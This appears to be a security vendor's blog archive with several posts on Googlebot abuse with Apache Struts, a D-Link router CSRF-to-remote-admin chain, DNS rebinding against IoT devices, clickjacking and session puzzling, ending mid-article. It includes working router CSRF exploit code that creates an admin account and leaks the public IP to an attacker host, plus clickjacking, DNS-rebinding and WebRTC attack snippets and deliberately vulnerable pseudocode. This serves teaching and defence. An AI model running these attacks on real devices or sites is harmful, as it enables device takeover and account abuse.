
Using Google Bots as an Attack Vector


According to statistics, Google consistently holds a market share of more than 90% among search engines. Many users even use their browser's address bar as Google's search bar. Being visible on Google is therefore crucial for websites, as it continues to dominate the market.


In this article, we analyze a study from F5 Labs which draws our attention to a new attack vector using Google's crawling servers, also known as Google Bots. These servers gather content from the web to build the searchable index from which Google's search engine results are drawn.

How Search Engines Use Bots to Index Websites

Each search engine has its own set of algorithms, but they all do the same basic thing: visit a given website, examine the content and links they find (a process known as 'crawling'), then grade and rank the resources. After one of these bots finds your website, it will visit and index it.

For a good ranking, you need to make sure that search engine bots can crawl your website without issues. Google specifically recommends that you avoid blocking search bots in order to achieve successful indexing. Attackers are aware of these permissions and have developed an interesting technique to exploit them – Abusing Google Bots.

The Discovery of a Google Bot Attack

In 2001, Michal Zalewski wrote about this trick in Phrack magazine. He also highlighted how difficult it is to prevent. Just how difficult became apparent 17 years later, when F5 Labs inspected the CroniX crypto miner. When F5 Labs' researchers analyzed some malicious requests they had logged, they discovered that the requests originated from Google Bots.

Initially, the F5 Labs researchers assumed that an attacker had simply spoofed the Google Bot User-Agent header value. But when they investigated the source of the requests, they discovered that the requests were indeed sent from Google's servers.

There were different possible explanations for why Google servers would send these malicious requests. One was that Google's servers had been hacked. However, that idea was quickly discarded as unlikely. Instead, the researchers focused on the scenario laid out by Michal Zalewski: Google Bots can be abused into behaving maliciously.

How Did the Google Bots Turn Evil?

Let’s take a look at how attackers can abuse Google Bots in order to use them as a tool for malicious intent.

First, let's suppose that your website contains the following link:

<a href="http://victim-address.com/exploit-payload">malicious link</a>

When Google Bots encounter this URL, they’ll visit it in order to index it. The request that includes the payload will be made by a Google Bot. This image illustrates what happens:

Using Google Bots as an attack vector diagram

The Experiment Conducted to Prove the Attack

Researchers verified the theory that a Google Bot request would carry the payload by conducting an experiment in which they prepared two websites: one that acted as the attacker and one that acted as the target. Links that carried the payload and pointed to the target website were added to the attacker's website.

Once the researchers had configured the attacker's website so that Google Bots would crawl it, they waited for the requests from the Google Bots. When they analyzed these requests, they found that the requests from the Google Bot servers did indeed carry the payload.

The Limits of the Attack

This scenario is only possible with GET requests, where the payload can be sent through the URL. Another drawback is that the attacker won't be able to read the victim server's response, which means that this attack is only practical if the response can be exfiltrated out of band, for example with a command injection or an SQL injection.

The Combination of Apache Struts Remote Code Evaluation CVE-2018-11776 and Google Bots

Apache Struts is a Java-based framework released in 2001. The regular discovery of code evaluation vulnerabilities in the framework has generated many discussions about its security. For example, the Equifax breach, which cost the company an estimated $439 million and led to the theft of a huge amount of personal data, was the result of CVE-2017-5638, a critical code execution vulnerability in the Apache Struts framework.

A Quick Recap of Apache Struts Remote Code Evaluation CVE-2018-11776

Let's recap the vulnerability, which can be exploited on recent Apache Struts versions. The CVE-2018-11776 vulnerability (disclosed in August 2018) is perfect for a Google Bot attack, since the payload is sent through the URL. Not surprisingly, this was the vulnerability that CroniX abused.

Example

Here are two examples:

When no namespace is set for an action, the vulnerable configuration allows the namespace to be taken from the URL path. In this situation it's possible to inject an OGNL (Object-Graph Navigation Language) expression. OGNL is an expression language for Java.

Here is an example of a configuration that is vulnerable to CVE-2018-11776:

<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

  <package name="default" extends="struts-default">

    <action name="help">
      <result type="redirectAction">
        <param name="actionName">date.action</param>
      </result>
    </action>
    ...
  </package>
</struts>

You can use the following sample payload to confirm the existence of CVE-2018-11776. If you open the URL http://your-struts-instance/${4*4}/help.action and you get redirected to http://your-struts-instance/16/date.action, you can confirm that the vulnerability exists.
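
If you prefer to script this check, here is a minimal sketch, assuming Node.js 18+ (for the built-in fetch) and the placeholder host from the example URL above; it simply looks for the evaluated expression in the redirect target.

const base = 'http://your-struts-instance'; // placeholder host from the example above

async function checkStruts() {
  // The "${4*4}" namespace is sent literally; a vulnerable server evaluates it.
  const res = await fetch(base + '/${4*4}/help.action', { redirect: 'manual' });
  const location = res.headers.get('location') || '';
  // A redirect to .../16/date.action means the OGNL expression was evaluated.
  return location.includes('/16/');
}

checkStruts().then((vulnerable) =>
  console.log(vulnerable ? 'Likely vulnerable to CVE-2018-11776' : 'No evaluation observed'));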

As mentioned before, this is the perfect context for a Google Bot attack. As CroniX shows, attackers can go as far as spreading Cryptomining malware using a combination of Apache Struts CVE-2018-11776 and Google Bots.

Solutions to the Google Bots Attack

At this point, the possibility of malicious requests reaching your website through Google Bots should make you question which third parties you can really trust. Yet blocking Google Bot requests entirely would hurt your position in the search engine's results: if Google Bots cannot crawl your website, your ranking drops. Attackers can exploit this dilemma. If your application detects malicious requests and blocks them, or even blocks the sending IP, attackers can deliver their payloads through Google Bot requests, so that you end up blocking the Google Bots themselves and damaging your search rankings even further.

Control the External Connections on Your Website

Attackers can use their own websites, or websites under their control, to direct this kind of malicious activity through Google Bots. They might also plant such links in comments under blog posts on other websites.

If you want an overview of the external links on your website, you can check the Out-of-Scope Links node in the Netsparker Knowledge Base following a scan.

Out of Scope Links

The Correct Handling of Links Added by Users

Even though it won't prevent attackers from abusing Google Bots to attack websites, you might still be able to protect your search engine ranking if you take certain precautions. For example, you can prevent search bots from following links by using the rel attribute in combination with the nofollow value. This is how it's done:

<a rel="nofollow" href="http://www.functravel.com/">Cheap Flights</a>

Due to the 'nofollow' value of the rel attribute, the bots will not follow the link.

Similarly, the meta tags you define between the <head></head> tags will help control the behavior of the search bots on all URLs found on the page.

<meta name="googlebot" content="nofollow" />
<meta name="robots" content="nofollow" />

You can give these commands using the X-Robots-Tag response header, too:

X-Robots-Tag: googlebot: nofollow

You should note that the commands given with X-Robots-Tag and meta tags apply to all internal and external links.
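
For example, here is a minimal sketch of sending that header from the server side, assuming a Node.js/Express application (the framework choice is an assumption made for the example):

const express = require('express');
const app = express();

// Add the X-Robots-Tag header to every response served by this application.
app.use((req, res, next) => {
  res.set('X-Robots-Tag', 'googlebot: nofollow');
  next();
});

app.get('/', (req, res) => res.send('<a href="https://example.com/">example link</a>'));
app.listen(3000);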

Further Reading

Read more about the research on the Google Bots attack in Abusing Googlebot Services to Deliver Crypto-Mining Malware.

Authors, Netsparker Security Researchers:

Ziyahan Albeniz
Umran Yildirimkaya
Sven Morgenroth


Sven Morgenroth Talks About PHP Object Injection Vulnerabilities on Paul's Security Weekly Podcast


Sven Morgenroth, a security researcher at Netsparker, was interviewed by Paul Asadoorian and Larry Pesce for Paul's Security Weekly #584. Sven talked about PHP Object Injection vulnerabilities and explained the dangers of PHP's unserialize function. Sven's talk was divided into three sections: some background, a technical demo, and a final focus on preventing the vulnerabilities.

  • To begin with, Sven asked and answered some basic questions. What are PHP objects and how are they created? What does the corresponding object look like? How are they stored? What are objects used for? Sven looked at the common operations of PHP objects, as well as their 'magic methods' – class methods that allow the execution of certain functions based on how objects are used.
  • During his demo, Sven showed the format of serialized PHP Objects, explained PHP's magic methods, and walked us through how to write an exploit for a PHP Object Injection vulnerability.
  • Sven pointed out that the vulnerability lies in both the object properties and the magic methods. This kind of vulnerability is not unique to PHP; Python, Ruby and Java share similar problems. In some respects, the vulnerability in these languages is worse than in PHP; in other respects, PHP is worse. Sven concluded with the vital question of what you can do to prevent these vulnerabilities:
    • Don't pass user-controlled input to unserialize
    • Often you can use json_encode and json_decode instead
    • If you need to store serialized data somewhere a user could change it, like in a form field, use an HMAC

For those who want more information about PHP Object injection, read Sven's other blog post, Why You Should Never Pass Untrusted Data to Unserialize When Writing PHP Code.

The Importance of the Content-Type Header in HTTP Requests


Dawid Czagan, Founder and CEO at Silesia Security Labs and author of Bug Hunting Millionaire, is listed in HackerOne's Top 10 Hackers. In a recent article on his website, Czagan disclosed the details of a vulnerability in routers that combines Cross-site Request Forgery (CSRF) and Remote Code Execution (RCE), which allowed him to discover and gain access to machines within the router's network.


During his research, Czagan found that the web interface of D-Link DIR-600 routers was vulnerable to CSRF. While CSRF is no longer listed in OWASP's Top 10, it is still a significant problem.

Taking a Look at the Exploit Code

The exploitation of a CSRF vulnerability requires user interaction. This means that attackers have to trick their victims into opening a malicious page, whose HTML code makes the victim's browser issue requests on their behalf.

We should take a closer look at the two requests required for the attack, made from the target's browser, to understand the vulnerability. Let's name them REQ1 and REQ2.

Here is REQ1:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");
    xhr.withCredentials = "true";
        var body = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>"+
"<postxml>"+
  "<module>"+
    "<service>DEVICE.ACCOUNT</service>"+
    "<device>"+
      "<account>"+
        "<seqno/>"+
        "<max>1</max>"+
        "<count>2</count>"+
        "<entry>"+
          "<name>admin</name>"+
          "<password>==OoXxGgYy==</password>"+
          "<group>0</group>"+
          "<description/>"+
        "</entry>"+
        "<entry>"+
          "<name>admin2</name>"+
          "<password>pass2</password>"+
          "<group>0</group>"+
          "<description/>"+
        "</entry>"+
      "</account>"+
      "<session>"+
        "<captcha>0</captcha>"+
        "<dummy/>"+
        "<timeout>180</timeout>"+
        "<maxsession>128</maxsession>"+
        "<maxauthorized>16</maxauthorized>"+
      "</session>"+
    "</device>"+
  "</module>"+
  "<module>"+
    "<service>HTTP.WAN-1</service>"+
    "<inf>"+
      "<web>2228</web>"+
      "<weballow>"+
        "<hostv4ip/>"+
      "</weballow>"+
    "</inf>"+
  "</module>"+
  "<module>"+
    "<service>HTTP.WAN-2</service>"+
    "<inf>"+
      "<web>2228</web>"+
      "<weballow>"+
        "<hostv4ip/>"+
      "</weballow>"+
    "</inf>"+
  "</module>"+
"</postxml>";
        xhr.send(body);
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request1" onclick="submitRequest();" />
    </form>
  </body>
</html>

Let's begin by analyzing the first request. The highlighted Content-Type line is the crucial point of the vulnerability, but first we have to understand the purpose of the entire request. Two admin accounts appear in the request. The first is the default administrator account with the password '==OoXxGgYy==', which already exists on the device; no changes are made to it. admin2, with the password 'pass2', is the new administrator account added through the vulnerability. Additionally, remote management access is enabled on port 2228 as part of the attack.

Here is REQ2:

<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/pigwidgeon.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request2" onclick="submitRequest();" />
</form>
</body>
</html>

In the second request, the URL-encoded SETCFG, SAVE and ACTIVATE action commands sent in REQ2 apply and activate the settings submitted in REQ1.

The Role of Routers in the CSRF Attack

The next step for the attacker is to discover the public IP address of the target, so that they can use the admin account and remote access port they obtained. The attacker does this by making the router ping a server they own, through the router's diagnostics interface, using this code:

<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/diagnostic.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "act=ping&dst=X.Y.Z.W";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request3" onclick="submitRequest();" />
</form>
</body>

Note: 'X.Y.Z.W' is the IP address of the attacker’s device.

Cross-site Request Forgery in Routers

Now that we understand the logic behind the attack, we can look at the detail that makes this Cross-site Request Forgery vulnerability unique. REQ1 plays an important role in the exploitation because it creates the new admin account and configures the remote management port. Note that the payload is in XML format, yet the highlighted line in REQ1 sets the request's Content-Type to text/plain instead of application/xml:

xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");

Had the developers enforced a Content-Type compatible with the data format they expect, such as application/xml, the exploitation of this vulnerability would not have been possible.

This is because, for cross-origin AJAX/XHR requests, browsers first send a preflight request using the OPTIONS method to check whether the receiving server accepts the request, before sending the actual request. A preflight request is sent in the following circumstances:

  1. If the request uses a method other than GET, HEAD or POST
  2. If, in POST requests, the Content-Type is set to something other than application/x-www-form-urlencoded, multipart/form-data or text/plain
  3. If a custom header was set in the request

This control and detection mechanism is known as the CORS preflight request. Had an XML Content-Type been required, the router would not have answered the preflight positively, the browser would never have sent REQ1, and the attack would have failed.
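
You can observe this behavior from the browser console with a quick sketch (the router URL is taken from the examples above and used purely as a placeholder):

// With text/plain the POST counts as a "simple" request, so no preflight is
// sent; switch the Content-Type to application/xml and the browser issues an
// OPTIONS preflight first, which the router would not answer positively.
fetch('http://192.168.0.1/hedwig.cgi', {
  method: 'POST',
  credentials: 'include',
  headers: { 'Content-Type': 'text/plain; charset=UTF-8' },  // no preflight
  // headers: { 'Content-Type': 'application/xml' },         // triggers a preflight
  body: '<postxml>...</postxml>',
});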

Details of the Same-origin Policy (SOP) and Cross-Origin Resource Sharing (CORS) can be found in our whitepaper, The Definitive Guide to Same-origin Policy.

Content-Type Header in Security

Setting the Content-Type header properly is critical. This header has been part of HTTP requests and responses since HTTP/1.0. By setting Content-Type in a request, you influence how the server interprets the request body. Similarly, the Content-Type of a response determines how the client processes it.

For example, if an HTTP response has a Content-Type of text/html, the browser renders the HTML tags and displays the resulting page.

In fact, to avoid Content Type Sniffing attacks, you must set the Content-Type header properly in the HTTP response.

Missing Content-Type Header

Make sure to pay proper attention to the Content-Type header in all HTTP requests and responses, and do not accept formats other than those you expect, as sketched below. The HTTP Security Headers Whitepaper can help you set the headers necessary to secure your websites.
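
As an illustration, here is a minimal sketch of both points, assuming a Node.js/Express endpoint (the framework and the route are assumptions made for the example):

const express = require('express');
const app = express();

app.post('/api/config', (req, res) => {
  // Reject any request whose body is not declared as XML.
  if (!req.is('application/xml')) {
    return res.status(415).send('Unsupported Media Type');
  }
  // Declare the response type explicitly and forbid MIME sniffing.
  res.set('Content-Type', 'application/json');
  res.set('X-Content-Type-Options', 'nosniff');
  res.send(JSON.stringify({ ok: true }));
});

app.listen(3000);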

Further Reading

You can read more about the vulnerability in Czagan’s article, From CSRF to Unauthorized Remote Admin Access.

Netsparker Sponsors OWASP AppSec California 2019


Netsparker is sponsoring and exhibiting at OWASP AppSec California 2019. The conference will take place from January 24th to 25th at the Annenberg Community Beach House, Santa Monica, California.

OWASP AppSec California 2019

Join Us at Booth 27 at OWASP AppSec California 2019

Come and visit us at Booth 27 in the exhibitor area, to learn how our Proof-Based Scanning Technology can help you save both time and money when automatically detecting vulnerabilities in the OWASP Top 10 list.

For more information about the conference, visit the official OWASP AppSec California 2019 website.

30% Off Promotional Code for OWASP AppSec California 2019!

Use the Promotional Code Netsparker-30off when buying your OWASP AppSec California 2019 Conference Ticket, to get a 30% discount.

Discovering and Hacking IoT Devices Using Web-Based Attacks


DNS rebinding attacks have been the topic of ongoing discussion for twenty years. Despite their efforts, browser vendors still haven't found a stable defence against these attacks. They were reported as fixed eight years ago. However, this type of attack has resurfaced with a new attack vector.


In general, it's safe to say that the upcoming trend for malicious hackers will be combining multiple existing attacks into new attack vectors. The DNS rebinding attack that made cryptocurrency wallets vulnerable is a good example of these new attack vectors.

In this article, we discuss the research conducted at Princeton and UC Berkeley on web-based attacks carried out against Internet of Things (IoT) devices which led to the discovery, hacking and takeover of these devices. The research was published in August, 2018.

Devices and Methods Used in the Discovery and Hacking of IoT Devices Research

Researchers aimed to test 15 IoT devices. Only seven of these devices were found to have local HTTP servers, so the research focused on them. They included: Google Chromecast, Google Home, a smart TV, a smart switch, and three cameras.

The attack method they used aimed to:

  1. Deceive the victim in order to make them visit an attacker controlled website
  2. Discover the IoT devices on the victim’s local network
  3. Take control of them using web-based attacks.

The Duration of the Attack

Technically, this isn't a new vector. The research paper cited earlier studies which found that it takes a minute, on average, for attackers to get results with these attack vectors. Curiously, a well-known study (What You Think You Know About the Web is Wrong) revealed that 55% of users spend no more than 15 seconds on a website. At first glance, it would appear that most users would not stay on a malicious page long enough to be affected.

However, in the Princeton and UC Berkeley study, researchers significantly decreased the duration of the attack. They stated that, using the method they discovered, devices on the local network could be discovered and accessed more quickly than in previous studies – except in the case of Chrome, which caches DNS responses and ignores the TTL if it's under a certain threshold. It is important to note that devices behind a firewall (on an internal network or in a DMZ) are generally considered to be secure, because users assume that outsiders cannot reach them. However, in the attack described here, the attacker already has access to a browser inside the victim's internal network!

The Discovery of HTTP Endpoints

Researchers analyzed the devices by connecting them to a Raspberry Pi wireless access point. The packets sent to and received from the devices, and the packets sent to and received from the mobile applications tied to each device, were observed and analyzed. As a result of this analysis, 35 GET request endpoints and eight POST request endpoints were discovered. These endpoints were used to identify the IP addresses in the discovery phase of the research.

Phases of the IoT Devices Research

Researchers conducted the study in two different phases, Discovery and Access:

  • The Discovery phase aimed to find IoT devices on the local network, using HTML5 features available in the victim's browser
  • The Access phase aimed to reach the devices' HTTP endpoints using DNS rebinding and the IP addresses discovered in the first phase

Discovery Phase: Identifying the IoT Devices

These are the steps taken in the Discovery attack phase of the study:

  1. Obtain the victim's local IP address with WebRTC (see the sketch after this list).
  2. Send requests to all IP addresses within the IP range on port 81. Since port 81 isn’t generally used, active devices would respond with a TCP RST packet immediately. For non-active devices on the IP range, the request packets would time-out.
  3. The attack script then sent the 35 GET endpoint requests collected in the analysis phase to each active IP address using HTML5. Depending on the error messages returned, the script determined whether the IP address matched any of the seven devices.
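
Step 1 relies on a well-known WebRTC trick; a hedged sketch is shown below. Note that modern browsers now mask these candidates with mDNS hostnames, so it mainly reflects browser behavior at the time of the research.

// Gather ICE candidates from a dummy peer connection; the candidate strings
// used to contain the machine's private IP address.
const pc = new RTCPeerConnection({ iceServers: [] });
pc.createDataChannel('');
pc.onicecandidate = (event) => {
  if (event.candidate) console.log(event.candidate.candidate);
};
pc.createOffer().then((offer) => pc.setLocalDescription(offer));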

The researchers planned to use three different operating systems (Windows 10, macOS, and Ubuntu) and four different browsers (Chrome, Firefox, Safari, Microsoft Edge). However, Chrome and Firefox were the only two browsers that were a suitable fit for the study. Safari and Edge were dropped because (Web-based Attacks to Discover and Control Local IoT Devices):

On Safari, all the Fetch requests timed out, so the attack script considered all IP addresses as inactive. In contrast, the script could use Fetch to correctly identify the active IP addresses on Edge, but the Edge browser did not expose detailed HTML5 error messages. Thus, the attack script was unable to identify any devices on Edge.

Access Phase: Taking Control of the IoT Devices

Here are the steps in the Access attack phase of the study:

  1. The victim visits the attacker controlled domain (domain.tld) and the victim’s browser executes the malicious JavaScript found on the attacker’s site. The domain still resolves to the attacker’s server IP.
  2. JavaScript requests another resource on domain.tld that is only present on the attacker's server (e.g. the message 'hello' on http://domain.tld/hello.php).
  3. If the victim’s local DNS cache still resolves to the attacker’s remote IP, the result of the query to /hello.php will yield the string 'hello', and the JavaScript repeats step 2.
  4. However, if the DNS entry for domain.tld has expired in the victim's cache, a new DNS query will be sent to the attacker's name server.
  5. Eventually, instead of the attacker’s remote IP, the local IP obtained from the Discovery attack will be returned, and /hello.php won't reply with the string 'hello', but with something different, like a 404 error, which tells the malicious script that the DNS rebinding attack was successful.

As a result of this attack, the malicious script circumvented the Same-Origin Policy and gained access to the web application running on the device. Now the attacker could reboot and launch video or audio files on Google Chromecast, Google Home, the smart TV, and smart switch devices.
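
The polling logic in steps 2 to 5 can be sketched as follows (domain.tld and /hello.php are the placeholders used above; the timing is illustrative):

// Keep fetching the marker resource until the response changes, which signals
// that domain.tld now resolves to the local device instead of the attacker's server.
async function waitForRebind() {
  for (;;) {
    try {
      const res = await fetch('http://domain.tld/hello.php');
      const body = await res.text();
      if (!body.includes('hello')) return true;   // rebinding succeeded
    } catch (e) {
      return true;                                // an error response also signals success
    }
    await new Promise((resolve) => setTimeout(resolve, 1000)); // retry every second
  }
}

waitForRebind().then(() => console.log('DNS rebinding detected'));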

How to Prevent DNS Rebinding Attacks on IoT Devices

According to the researchers, the user, browser vendors, IoT manufacturers, and DNS providers each have to take precautions in order to avoid a DNS rebinding attack. Here are some of the countermeasures listed in the research:

  1. The user can disable WebRTC in their browser to prevent their private IP from being disclosed. However, the attacker can still try to discover the user's private IP range by sending requests to all the *.1 addresses (typical router addresses) in the private IP ranges.
  2. The attacker assumes that all the IoT devices are in the same IP range as the victim's PC. The user can configure their home router's DHCP server to give out IP addresses on a different subnet, such as a /16.
  3. The user can install dnsmasq, which prevents DNS rebinding by dropping RFC 1918 addresses from DNS replies. The user can also use OpenWRT routers, which ship with dnsmasq.
  4. IoT manufacturers can validate the Host header of requests sent to their web interfaces and block access if it is not an RFC 1918 private IP address.
  5. DNS providers can use a mechanism such as dnswall to filter private IPs out of DNS replies.
  6. Browser vendors can develop extensions that limit the access of public websites to private IP ranges.

Further Information

For further information on the Princeton and UC Berkeley research discussed in this blog post, see Web-based Attacks to Discover and Control Local IoT Devices.

To read more about web based attack vectors on applications and devices inside your local network, see Vulnerable Web Applications on Developers' Computers Allow Hackers to Bypass Corporate Firewalls.

Authors, Netsparker Security Researchers:

Ziyahan Albeniz
Sven Morgenroth
Umran Yildirimkaya

Clickjacking Attack on Facebook: How a Tiny Attribute Can Save the Corporation


Clickjacking, introduced in 2002, is a UI Redressing attack in which a web page loads another webpage in a low-opacity iframe and causes state changes when the user unknowingly clicks on the buttons of the hidden page. In this article, we explain how the Clickjacking attack works and the importance of the X-Frame-Options header, including a discussion of a recent discovery by a researcher who found a Clickjacking attack on Facebook.

Introduction to Clickjacking

This type of attack was largely ignored until 2008, when the inventors of the attack, Jeremiah Grossman and Robert Hansen, demonstrated how a Clickjacking attack against Adobe Flash could acquire permissions on a victim's computer. Grossman originally named the attack by combining the words 'click' and 'hijacking', and it has passed through different categorizations and name variations since. For example, the variant in which an attacker collects likes for their own post using the Clickjacking method became known as 'Likejacking'.

Although the Clickjacking attack can be mitigated with methods such as frame busting, the most effective defense was introduced by Microsoft in 2009. With the release of Internet Explorer 8, Microsoft introduced the X-Frame-Options (XFO) HTTP response header. Soon after the announcement, all major browsers implemented this header, and in 2013 RFC 7034 was released.

How Does the Clickjacking Attack Work?

The Clickjacking attack method works by loading the target website inside a low opacity iframe and overlaying it with an innocuous looking button or link. This then tricks the user into interacting with the vulnerable website beneath by forcing the user to click the apparently safe UI element, triggering a set of actions on the embedded, vulnerable website.

In this example, Amazon is loaded in a low-opacity iframe and is therefore not visible to the user. The user sees only the Click Here button. Once they click on it, however, it is actually the Buy button on Amazon that gets clicked, triggering a set of actions on Amazon. (Please note that Amazon is not vulnerable to clickjacking; this is merely an example of how it would work.)

Since these interactions take place as if the victim was intentionally browsing the website, the interaction triggered on Amazon will also include the victim’s credentials (such as Cookies).
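
To make the mechanics concrete, here is a hedged sketch of the overlay technique in plain JavaScript; the target URL, sizes and positions are illustrative only, and, as noted above, Amazon itself is not vulnerable.

// Hypothetical attacker page script: load the target in a nearly transparent
// iframe and stack it above a decoy button.
const frame = document.createElement('iframe');
frame.src = 'https://shop.example/buy-now';      // placeholder "vulnerable" page
frame.style.cssText =
  'position:absolute; top:0; left:0; width:500px; height:300px; ' +
  'opacity:0.01; z-index:2; border:0;';          // nearly invisible, but on top

const decoy = document.createElement('button');
decoy.textContent = 'Click Here';
decoy.style.cssText =
  'position:absolute; top:120px; left:200px; z-index:1;'; // sits under the real button

document.body.append(decoy, frame);
// The victim believes they are clicking the decoy, but the click lands on the
// framed page because the transparent iframe is stacked above it.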

The Clickjacking Bug on Facebook

On December 21, a security researcher reported an investigation in which he noticed suspicious posts shared on his friends' Facebook walls and uncovered a scam campaign. When he clicked on a link that directed him to a comics website, he was asked to confirm his age. After confirming his age, he was redirected to the comics website, but the post was also published on his Facebook wall without any action on his part.

The researcher discovered an iframe and examined its source code. He found that these frames ultimately loaded this Facebook URL:

https://mobile.facebook.com/v2.6/dialog/share?app_id=283197842324324&href=https://example.com&in_iframe=1&locale=en_US&mobile_iframe=1

When you click on this link, you’re prompted to share the content on your wall.

Interestingly, the researcher realized that the XFO header was set properly on the page, which should normally stop it from being loaded in an iframe (even by other Facebook pages):

X-Frame-Options: DENY

The researcher proceeded to check whether the X-Frame-Options header was implemented correctly on all major browsers. He confirmed that they all worked as expected. Next, he checked whether the built-in browser in Facebook’s Android app implemented the XFO header correctly. It turned out that the XFO response header was not set when the user logged in to Facebook from a mobile device.

How Did Facebook Respond to the Clickjacking Attack?

Facebook refused to fix this issue, but as a precaution, it created a second prompt page to give users control over whether they wanted to proceed with the share.

So, how does Facebook's fix work? Whenever you click the button to share the post, a second confirmation page opens in a new tab. It asks you whether you want to share the message and lets you choose the people you want to share the link with. The new page opens because of the '_blank' value of the target attribute on the link on the first page. Whenever it is set, the linked page is opened in a new tab. This thwarts the clickjacking attack, because the new tab correctly implements X-Frame-Options: DENY.

It's hard to say why Facebook decided to open a completely new tab to share a message. This makes sharing just a tiny bit more inconvenient. For a company like Facebook, that aims to make sharing content as effortless as possible, this sounds like a terrible fix. I wouldn't be surprised if this was only a temporary solution or if Facebook actually used this second page as extra advertising space.

How to Properly Prevent Clickjacking Attacks in Your Web Applications

In order to protect users from UI Redressing attacks like Clickjacking, the best tactic is to prevent other websites from rendering your pages inside frames or iframes. The most effective method is the X-Frame-Options HTTP security header.

X-Frame Options Directives

There are three X-Frame-Options directives available.

X-Frame-Options: DENY | SAMEORIGIN | ALLOW-FROM URL
DENY: The page must not be embedded in another page within an iframe or any similar HTML element.

SAMEORIGIN: The page can only be embedded by a page that matches it in scheme, hostname and port. For example, https://www.example.com can only be loaded by https://www.example.com, while https://www.attacker.com, and even http://example.com, are not allowed to embed it.

For further information about Same-Origin Policy, see Introducing the Same-Origin Policy Whitepaper.

ALLOW-FROM URL: The page can only be framed by the URL specified (whitelisted) here.

There are two important points to remember with X-Frame-Options:

  • Chromium based browsers only partially support X-Frame-Options (the ALLOW-FROM directive is unavailable)
  • Using the ALLOW-FROM URL instruction, we can whitelist only one domain and allow our website to be loaded in an iframe.

Important Points About the X-Frame-Options HTTP Header

  • The X-Frame-Options header must be present in the HTTP responses of all pages
  • Instead of X-Frame-Options, the Content-Security-Policy frame-ancestors directive can be used:
Content-Security-Policy: frame-ancestors 'none'; // No URL can load the page in an iframe.
Content-Security-Policy: frame-ancestors 'self'; // Serves the same function as the SAMEORIGIN parameter.
Content-Security-Policy: frame-ancestors https://www.example.com;

This serves the same function as the ALLOW-FROM instruction. Importantly, you can whitelist more than one URL with this directive:

Content-Security-Policy: frame-ancestors https://www.example.com https://another.example.com;
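
Here is a minimal sketch of sending these headers from the server side, assuming a Node.js/Express application (the framework choice is an assumption made for the example):

const express = require('express');
const app = express();

app.use((req, res, next) => {
  res.set('X-Frame-Options', 'SAMEORIGIN');
  // The CSP equivalent, which newer browsers prefer over X-Frame-Options.
  res.set('Content-Security-Policy', "frame-ancestors 'self'");
  next();
});

app.get('/', (req, res) => res.send('Protected page'));
app.listen(3000);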

Two Interesting Session-Related Vulnerabilities


Sessions are an essential part of most modern web applications. This is why session-related vulnerabilities often have a sizable impact on the overall security of a web application. They frequently allow the impersonation of other users and can have other dangerous side effects.


What Are Session Variables?

For those not familiar with session variables, they are server-side variables whose value is tied to the current session. This means that if a user visits the website, you could store their username in the session variable as they log in and it will be available until the session expires or the user logs out. If another user logs in, that triggers a new session and the session variable will return a different username for that particular user.

Session Variable Example

Let's take a look at an example of how session variables work. Be aware that this example uses stripped-down pseudocode to help illustrate an otherwise complicated concept. Do not use anything like this in production!

Login

user = getUser(input['username']);
if(compare_hash(input['password'], user.hash) === true) {
session['username'] = user.name;
session['logged_in'] = true;
return true;
} else {
session['logged_in'] = false;
return false;
}

Index

if(session['logged_in'] === true) {
print('Hello ' + sanitize(session['username']))
}

If a user called Alice logged in, she would be greeted with "Hello Alice". If Bob was logged in at the same time and opened the same page, he would see "Hello Bob" instead. The session variable is available across different files and isn't restricted to the file it is declared in. This can lead to a complication.

Session Puzzling

In this example, we're going to look at three different files. Try to spot the problem in the code before you continue reading the article. Also, note that this example contains vulnerable pseudocode. Do not use anything like this in production!

Login (snippet)

01 // check if phone number is confirmed
02 if(user.phone_number_confirmed ===true) {
03  // set the `confirmed` session variable to true since we need to check it later
04  session['confirmed'] = true;
05 }
06 // the user wants to get notified if somebody logs in to their account?
07 if(user.notify_on_login ===true) {
08  // we need to check this as well
09  session['notify_on_login'] = true;
10 }

Index (snippet)

01 // we handle the login notifications here
02  if(session['notify_on_login'] ===true) {
03  var message = 'Somebody just logged into your account.';
04  // if the phone number is confirmed...
05  if(session['confirmed'] ===true) {
06  // we send an SMS text message
07   sendTextMessage(message);
08  // if the phone number is not confirmed
09   } else {
10  // we send an email instead
11   sendEmail(message);
12   }
13  }

Admin (snippet)

01  // if the user submitted a password
02  if(input['password'] !==null) {
03   // check if it matches the one that's required to access the admin panel
04  var result = check_admin_password(input['password']);
05   // if it's correct...
06   if(result ===true) {
07  // confirm that the user was logged in
08   session['confirmed'] = true;
09   } else {
10   // set the confirmation to false
11   session['confirmed'] = false;
12   }
13  }
14  // if the user didn't supply the correct password
15  if(session['confirmed'] !==true) {
16   print('You must prove that you are allowed to visit the admin section.')
17   print('Please type in the password.');
18  // generate a password form and just exit
19   generatePasswordForm();
20   exit();
21  // if the user supplied the right password....
22  } else {
23   // load the admin section and grant access
24   loadAdminSection();
25  }

Did you spot the vulnerability? If you found it, then congratulations! But don't worry if you couldn't spot it right away. We'll explain what went wrong in the above code.

